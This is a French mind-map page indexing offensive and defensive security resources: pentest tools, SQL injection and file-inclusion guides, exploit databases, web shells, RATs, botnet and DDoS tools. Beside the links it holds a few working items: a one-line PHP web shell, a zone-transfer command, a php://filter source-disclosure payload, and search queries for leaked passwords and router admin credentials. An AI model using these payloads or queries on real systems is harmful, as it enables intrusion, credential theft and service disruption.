Sécurité informatique

Lancez-Vous. C'est gratuit
ou s'inscrire avec votre adresse e-mail
Sécurité informatique par Mind Map: Sécurité informatique

1. Infond

1.1. Ubuntu post installation script infondlinux

2. pentest

2.1. Static code analysis

2.1.1. PHP

2.1.1.1. RIPS

2.1.2. C

2.1.2.1. Fortify

2.1.2.2. heap overflow

2.1.2.2.1. Valgrind

2.1.3. tools list

2.1.3.1. http://samate.nist.gov/index.php/Source_Code_Security_Analyzers.html

2.1.4. C++, java

2.1.4.1. recréer les diagrammes de classes

2.1.4.1.1. bouml

2.2. training

2.2.1. de-ice training platform

2.2.2. lampsecurity.org

2.3. information gathering

2.3.1. footPrinting

2.3.1.1. hostmap.rb

2.3.1.1.1. Description hostmap

2.3.1.1.2. hostmap sur packetstorm

2.3.1.2. dnsdic.py

2.3.1.3. dnsbf.py

2.3.1.4. robtex.com

2.3.1.5. MetaGoofil

2.3.1.6. Google subdomains finder

2.3.1.6.1. gxfr

2.3.1.7. creepy geolocalisation agregator

2.3.1.8. maltego

2.3.1.9. subdomainer.pl

2.3.1.10. http://dnshistory.org/

2.3.1.11. fierce

2.3.1.12. domain names

2.3.1.13. www.archive.org

2.3.1.14. www.score3.com

2.3.1.15. wikto

2.3.2. find vuln sites

2.3.2.1. shodan

2.3.3. port scanning

2.3.3.1. Scripts nmap

2.3.3.1.1. Tuto fr coder un plugin nmap

2.3.4. transfert de zone

2.3.4.1. dig -t axfr @dns.server.com. macible.fr.

2.4. protocole

2.4.1. http

2.4.1.1. Firefox add-ons

2.4.1.1.1. Live http headers

2.4.1.1.2. Firebug

2.4.1.1.3. TamperData

2.4.1.2. spider

2.4.1.2.1. dirBuster

2.4.1.3. Http splitting

2.4.1.3.1. white paper

2.4.1.3.2. yehg WebGoat

2.4.2. sql

2.4.2.1. sql injection

2.4.2.1.1. safe3 sql injector

2.4.2.1.2. sqlmap

2.4.2.1.3. havij (win)

2.4.2.1.4. exploitmyunion

2.4.2.1.5. commandes_utiles en injection sql

2.4.2.1.6. sqlsus

2.4.2.1.7. sql injection tools list

2.4.2.1.8. Sql injection python tool

2.4.2.2. tutos

2.4.2.2.1. Reiner's weblog exploiting hard filtered sql injections

2.4.2.2.2. sqli detection evasion

2.4.2.2.3. M Cherifi

2.4.2.2.4. pentestmonkey cheat sheets

2.4.2.2.5. LordDaedalus

2.4.2.2.6. phpsecure

2.4.2.2.7. sql injection pocket reference

2.4.2.2.8. Bit shifting

2.4.2.2.9. find_in_set

2.4.2.2.10. Bypassing WAF

2.4.2.2.11. Ms access

2.4.2.2.12. sqli

2.4.3. php

2.4.3.1. file include

2.4.3.1.1. http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

2.4.3.1.2. liste de fichiers intéressants

2.4.3.1.3. en PHP: passthru() = exec()

2.4.3.1.4. php://filter/convert.base64-encode/resource=index.php permet afficher source fichier

2.4.3.2. fonctions pourries

2.4.3.2.1. ereg, eregi

2.4.3.3. obfuscation

2.4.3.3.1. weevely.py

2.4.3.3.2. Repérer obfuscation

2.4.3.4. PHP vulnerability whitebox hunter

2.4.4. tcp

2.4.4.1. netcat Windows

2.4.4.2. Detect load balancer

2.4.4.3. MITM pour analyser flux réseaux Mallory

2.4.5. ssh

2.4.5.1. hydra

2.4.5.2. edgessh

2.4.6. scapy

2.4.6.1. présentation de scapy

2.4.7. simulateur réseau

2.4.7.1. GNS3

2.4.8. fuzzer

2.4.8.1. sulley

2.4.8.2. spike

2.4.9. javascript

2.4.9.1. jsunpack

2.4.9.1.1. https://code.google.com/p/jsunpack-n/

2.4.9.1.2. http://jsunpack.jeek.org/dec/go

2.4.10. sip

2.4.10.1. voip sipvicious

2.4.11. pcap

2.4.11.1. xplico pcap network capture data extraction

2.4.11.2. rawcap tiny sniffer for Windows generate pcap

2.4.12. SSTP

2.4.12.1. SSTP_reveal.py

2.4.13. VOIP

2.4.13.1. pentesting VOIP

2.4.13.2. VOIP classic exploits

2.4.14. web services

2.4.14.1. http://clawslab.nds.rub.de/wiki/index.php/Main_Page

2.4.15. Netbios

2.4.15.1. Net2sharepwn

2.5. listes outils pentest

2.5.1. http://dirk-loss.de/python-tools.htm

2.6. deobfuscation de code

2.6.1. beautifier

2.7. decompileur

2.7.1. flash

2.7.1.1. sothink

2.7.2. java

2.7.2.1. Win: DJ java decompiler (utiliser fichier ligne commande)

2.7.2.2. jdgui

2.7.3. AciveX

2.7.3.1. TypeLib Browser

2.7.3.2. Visual Studio

2.7.3.3. WinAPIOverride32

2.7.3.4. Autodebug

2.8. versionning

2.8.1. wamp

2.8.1.1. permet de choisir rapidement parmi plusieurs version Apache, PHP, MySQL...

2.9. assembleur

2.9.1. hextoasm

2.9.1.1. python -c "print "\\x90\\x42"" | tr -d\r"\\r\\n" | ndisasm -u -

2.10. bruteforce

2.10.1. rainbow tables

2.10.1.1. http://rainbowtables.shmoo.com/

2.11. audit windows

2.11.1. astuces

2.11.1.1. Nicolas Ruff

2.11.1.2. http://pentestit.com/2009/05/14/reset-administrator-password-windows/

2.11.2. shatter attacks

2.11.3. Kernel

2.11.3.1. ioctl

2.11.3.1.1. http://www.osronline.com/article.cfm?article=229

2.11.4. scanner NetBios

2.11.4.1. Superscan

2.11.4.2. ldap browser

2.11.5. exploit metsploit ms 0867

2.11.6. Post exploitation Windows

2.11.6.1. http://www.ikuppu.com/2011/09/windows-post-exploitation.html

2.12. reversing

2.12.1. comment debugger une VM

2.12.2. VisualStudio & nasm

2.12.3. tutos

2.12.4. windows internals

2.12.4.1. http://www.reactos.org

2.12.4.2. useful windb commands

2.12.4.2.1. // Get module name of module to load bp nt!MmLoadSystemImage;g; dS /c 100 poi(esp+4) g; dS /c 100 poi(esp+4)

2.12.4.2.2. adresse appel win32k nt!IopLoadDriver+0x669

2.12.5. parse PE files

2.12.6. reversing kit 2010

2.12.7. ollydbg

2.12.7.1. ollyflow

2.12.7.2. ollyadvanced

2.12.7.3. memorydump

2.12.8. diffing tool

2.12.8.1. darun grim 3

2.13. exploit

2.13.1. exploits db

2.13.1.1. http://osvdb.org/

2.13.1.2. http://www.intelligentexploit.com/

2.13.1.3. http://www.cvedetails.com/

2.13.1.4. http://www.exploit-db.com/

2.13.1.5. http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm

2.13.1.6. http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm

2.13.2. metasploit

2.13.2.1. http://en.wikibooks.org/wiki/Metasploit/WritingWindowsExploit

2.13.2.2. doc writing exploit

2.13.2.3. scripter meterpreter

2.13.2.4. 50 best exploits

2.13.2.5. Tuto

2.13.3. directory traversals

2.13.3.1. DotDotPwn

2.13.4. Inj3ct0r

2.13.5. obfuscation

2.13.5.1. anti debugging article

2.13.6. privilege escalation

2.13.6.1. linux

2.13.6.1.1. sock_send_page

2.13.6.2. win

2.13.6.2.1. Kitrap0d

2.13.7. Shellcode 2 exe

2.13.8. backdoors

2.13.8.1. reverse shell

2.13.8.1.1. ncat (dans nmap) = netcat +ssh

2.13.8.1.2. icmpsh

2.13.8.1.3. 26 exploit kits

2.13.8.1.4. devil Shell

2.13.8.1.5. icmp Shell

2.13.8.2. Reverse connect

2.13.8.2.1. via serveur ssh

2.13.8.3. rat

2.13.8.3.1. poisonivy

2.13.8.3.2. htran

2.13.8.4. webshells

2.13.8.4.1. FaTaLisTicq

2.13.8.4.2. php-findsock-shell

2.13.8.4.3. NFM

2.13.8.4.4. R57

2.13.8.4.5. PHPJackal

2.13.8.4.6. Zehir

2.13.8.4.7. Web shell detection

2.13.8.4.8. JspSpy

2.13.8.4.9. C99

2.13.8.4.10. weevely

2.13.8.4.11. Ani-Shell: Mass Mailer, Web-Server Fuzzer, DDoser

2.13.8.4.12. wso

2.13.8.4.13. Reverse shell cheat sheet

2.13.8.4.14. tiny PHP Shell http://h.ackack.net/tiny-php-shell.html <?=($_=@$_GET[2]).@$_($_GET[1])?>

2.13.8.4.15. Ani-Shell

2.13.8.5. bootkits

2.13.8.5.1. tutos

2.14. google hacking

2.14.1. intitle:'index of' Parent directory

2.14.2. inurl:admin

2.14.3. inurl:backup

2.14.4. ext:php

2.15. creation de backdoor

2.15.1. win32com permet utilisation de internet explorer

2.15.2. py2exe pour compiler un prog python

2.15.3. nsis pour créer un executable a partir de dll multiples

2.15.4. ntsd.exe

2.16. race conditions

2.16.1. http://blog.stalkr.net/2010/11/exec-race-condition-exploitations.html

2.16.2. http://dividead.wordpress.com/2009/07/21/blocking-between-execution-and-main/

2.16.3. http://blog.stalkr.net/2011/04/pctf-2011-18-small-bug.html

2.17. LFI/RFI

2.17.1. fimap.py

2.18. local exploit

2.18.1. training

2.18.1.1. intruded.net

2.18.2. malware injection

2.18.2.1. kOrUPt - tuto PE injection

2.18.2.2. PowerSyringe - PowerShell-based Code/DLL Injection Utility

2.18.3. Fuzzing

2.18.3.1. liste de fuzzers

2.18.3.2. File Fuzz

2.18.3.2.1. ppt

2.18.3.3. Ioctl Fuzzer

2.18.3.4. MiniFuzz

2.18.3.5. pdf Fuzzer

2.18.3.5.1. PacketStorm

2.18.3.5.2. derkeiler

2.18.4. Recherche mots de passe en clair

2.18.4.1. mimikatz http://pauldotcom.com/2012/02/dumping-cleartext-credentials.html

2.19. Remote shells

2.19.1. php

2.19.1.1. php-reverse-shell

2.19.1.2. c99

2.19.1.3. isko

2.19.1.4. shellzx

2.19.2. Linux

2.19.3. reduh backdoor php, jsp, asp

2.20. routeurs

2.20.1. http://www.routerpwn.com/

2.21. ids decoy

2.21.1. inundator

2.22. XSS

2.22.1. http://ha.ckers.org/xss.html

2.23. forensics

2.23.1. Monter des partitions OSFMount

2.23.2. Passware password recovery toolkit

3. forensics

3.1. analyse pdf http://peepdf.googlecode.com

3.2. windows

4. GSM

4.1. osmocombb

4.1.1. shop

5. veille

5.1. gouv

5.1.1. NIST

5.1.2. CERTA

5.2. fiches sensibilisation http://www.ene.fr/fr/eneinformer/fiches-information-usages-tic/fiches-ssi-pratic.html

5.3. forum iranien http://forum.itsecteam.com/

5.4. http://www.offensivecomputing.net/

5.5. securityfocus

5.6. archives

5.6.1. http://www.orkspace.net/secdocs/

5.7. mindmaps

5.7.1. Paolo Pinto hacking

5.7.2. web 2.0

5.7.3. aide memoire pastebin

5.8. source code

5.8.1. http://en.pudn.com/

5.9. Search engines http://r00tsec.blogspot.com/2011/05/search-engine-for-everything.html

5.10. http://lulzsecurity.com/releases

5.11. http://www.exploitsearch.net/

5.12. crypto

5.12.1. http://eprint.iacr.org/

6. botnets

6.1. http://www.clusif.asso.fr/fr/production/ouvrages/pdf/CLUSIF-2009-Bots-et-Botnets.pdf

6.2. http://www.cisco.com/web/about/security/intelligence/bots.html

6.3. http://www.lasecuriteoffensive.fr/faisabilité-d’un-réseau-décentralisé-introduction

6.4. publication Cliff Zou

6.5. framework peer to peer GNUnet

6.6. Resilient botnet command and control with tor

6.7. Take a deep breath: a Stealthy, Resilient and Cost-Effective Botnet Using Skype

7. trusted platforms

7.1. Noémie Floissac

7.1.1. MISC 45 Quelle confiance accorder aux TPM?

7.1.2. 2009 Quel avenir pour le TPM

7.2. Infond

7.2.1. authentification forte avec TPM

7.2.2. ecryptfs et TPM

8. divers

8.1. svn

8.1.1. http://tortoisesvn.net/

8.2. antivirus

8.2.1. virustotal

8.2.2. http://www.threatexpert.com

8.2.3. Url scan http://vscan.urlvoid.com/

8.3. icones

8.4. SimpleHttpServer

8.4.1. python -m SimpleHTTPServer 80

8.5. MediaWiki

8.5.1. install sous apache2

8.5.2. sécuriser son wiki

8.5.3. tuto

8.6. archives events http://avondale.good.net/dl/bd/

8.7. openssl

8.7.1. signer certificat

8.7.2. x509 to pkcs12

8.8. soft old versions http://www.filehippo.com/

8.9. find 0days

8.9.1. http://crash-stats.mozilla.com/query

8.10. Crypto

8.10.1. Vigenere

8.10.1.1. http://www.bibmath.net/crypto/poly/viganaljava.php3

8.10.2. RSA

8.10.2.1. rsa.py http://www.amk.ca/python/writing/crypto-curiosa

8.10.2.2. tuto rsa

8.10.2.2.1. http://www.siteduzero.com/tutoriel-3-2299-crypter-et-decrypter.html

8.10.2.3. http://s310652510.onlinehome.fr/t0ka.zip

8.10.2.4. module python rsa http://stuvel.eu/rsa

8.10.3. Substitution monoalphabetique

8.10.3.1. http://www.secretcodebreaker.com/scbsolvr.html

8.10.4. MD5

8.10.4.1. MD5 collisions exploit http://www.mscs.dal.ca/~selinger/md5collision/

8.10.4.2. md5 multiple sites rainbowtables search http://sqlsus.sourceforge.net/

8.10.5. hash identifier http://code.google.com/p/hash-identifier/

8.10.6. Encoders/decoders

8.10.6.1. http://www.crypo.com/

8.10.7. morse

8.11. Metasploit

8.11.1. Writing msf modules http://www.metasploit.com/redmine/projects/framework/wiki/ExploitModuleDev

8.12. zenk roulette

8.12.1. 1

8.12.2. 2

8.12.3. 3

8.12.4. 4

8.12.5. 5

8.13. photos

8.13.1. http://tineye.com/

8.13.2. http://regex.info/exif.cgi

8.13.3. exiv2

8.13.4. delete image exif tags: $ mogrify -strip picture.jpg

8.14. credentials

8.14.1. site:pastebin.com "Program: Internet Explorer" password

8.14.2. shodan

8.14.2.1. netgear "admin password"

8.15. astuce anti spidering

8.16. RFID

8.16.1. http://www.proxclone.com/

8.17. installation Linux

8.17.1. Luks http://clickngeek.blogspot.com/2010/05/installation-dune-ubuntu-avec-lukslvm.html

8.18. créer dessins réseaux

8.18.1. lovelycharts

8.19. anti-reversing technics

8.19.1. http://www.codeproject.com/KB/security/AntiReverseEngineering.aspx

8.20. Mots de passe des applications Windows

8.20.1. http://securityxploded.com/passwordsecrets.php

8.21. certification SSI

8.21.1. OSCP

8.22. logs

8.22.1. scanner de logs

8.22.1.1. http://www.xenuser.org/tools/scan_log.py

8.23. Forensics

8.23.1. Effacer un dd http://www.cs.auckland.ac.nz/~pgut001/pubs/secure_del.html

8.24. taskmanager trick at 10:41 /interactive “cmd.exe”

8.25. openvpn

8.25.1. Openvpn ssl & ssh on port 443 http://www.rutschle.net/tech/sslh.shtml

8.26. anonymat

8.26.1. paiement: bitcoin

8.26.2. VPN

8.26.2.1. https://www.mullvad.net/en/

8.27. Moteur de recherche

8.27.1. http://www.hackchina.com/en/

8.28. le format PE

8.28.1. http://opc0de.tuxfamily.org/?p=6

8.29. dd

8.29.1. dcfldd

8.29.2. sudo watch -n 10 kill -USR1 $(pidof dd)

8.30. Signatures exécutables

8.30.1. Disitool.py

8.31. Anti sniffing

8.31.1. sniffjoke http://www.delirandom.net/sniffjoke/

8.32. Cheat sheets http://packetlife.net/library/cheat-sheets/

8.33. pkzip plaintext attack using pkcrack http://www.securiteam.com/tools/5NP0C009PU.html

8.34. forensics

8.34.1. CB finder http://www.xmco.fr/panbuster.html

8.35. captcha

8.35.1. ocr python howto http://fluxius.handgrep.se/2011/06/14/rssil-captcha-des-chiffres-et-des-lettres/

8.36. Sniff via iptables http://r00tsec.blogspot.com/2011/06/sniffing-using-iptables.html

8.37. gdb tuto howto http://sourceware.org/gdb/current/onlinedocs/gdb/

8.38. Ruby RVM utiliser simultanément plusieurs versions http://beginrescueend.com/rvm/basics/

8.39. Routeurs

8.39.1. http://www.routerpwn.com/

8.40. RSS http://fulltextrssfeed.com/

8.41. Steganographie

8.41.1. Tools list http://marcoramilli.blogspot.com/2012/03/steganography-tools-non-exhaustive.html

8.41.2. digital invisible ink toolkit

8.42. Proxy python http://code.google.com/p/proxpy

8.43. ctf

8.43.1. http://devpsc.blogspot.fr/

8.43.2. collaboration http://rizzoma.com/

9. phones

9.1. iPhone

9.1.1. independance helpfullinks

9.1.2. iPhone dev team portal

9.1.3. http://www.zdziarski.com/blog/

9.1.4. http://networkpx.blogspot.com/

9.1.5. http://blog.metasploit.com/2007/10/cracking-iphone-part-1.html

9.1.6. http://www.brickhousesecurity.com/iphone-spy-data-recovery-stick.html

9.1.7. http://theiphonewiki.com/wiki/index.php?title=Main_Page

9.1.8. Baseband reverse http://www.slideshare.net/slides_luis/baseband-playground-10652487

9.1.9. http://esec-lab.sogeti.com/post/iOS-5-data-protection-updates

9.1.10. http://trailofbits.com/2011/08/10/ios-4-security-evaluation/

9.1.11. iPhone forensics howto http://securityxploded.com/demystifying-iphone-forensics-on-ios5.php

9.2. Android

9.2.1. http://thomascannon.net/projects/android-reversing/

10. DDoS

10.1. defense

10.1.1. SYN flooding

10.1.1.1. http://www.tux-planet.fr/contrer-une-attaque-ddos-de-type-syn-flood-sous-linux/

10.2. attack

10.2.1. sokhoi T50

10.2.2. Loic http://sourceforge.net/projects/loic/

10.2.3. http://www.yersinia.net/attacks.htm

10.2.4. sockstress http://h.ackack.net/sockstress.html

10.2.5. xerxes http://www.thehackernews.com/2011/07/xerxes-most-powerful-dos-tool.html

10.2.6. Pythonloic http://code.google.com/p/pythonloic/downloads/list

10.3. references

10.3.1. http://www.authsecu.com/dos-attaque-deny-of-service/dos-attaque-deny-of-service.php

11. Cloud

11.1. Memcached

11.1.1. http://www.sensepost.com/blog/4873.html

12. fuzzers

12.1. 802.11 wifi access points http://code.google.com/p/wifuzz/

13. IDS detection nmap nse script http://seclists.org/nmap-dev/2011/q2/1005

14. socat http://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES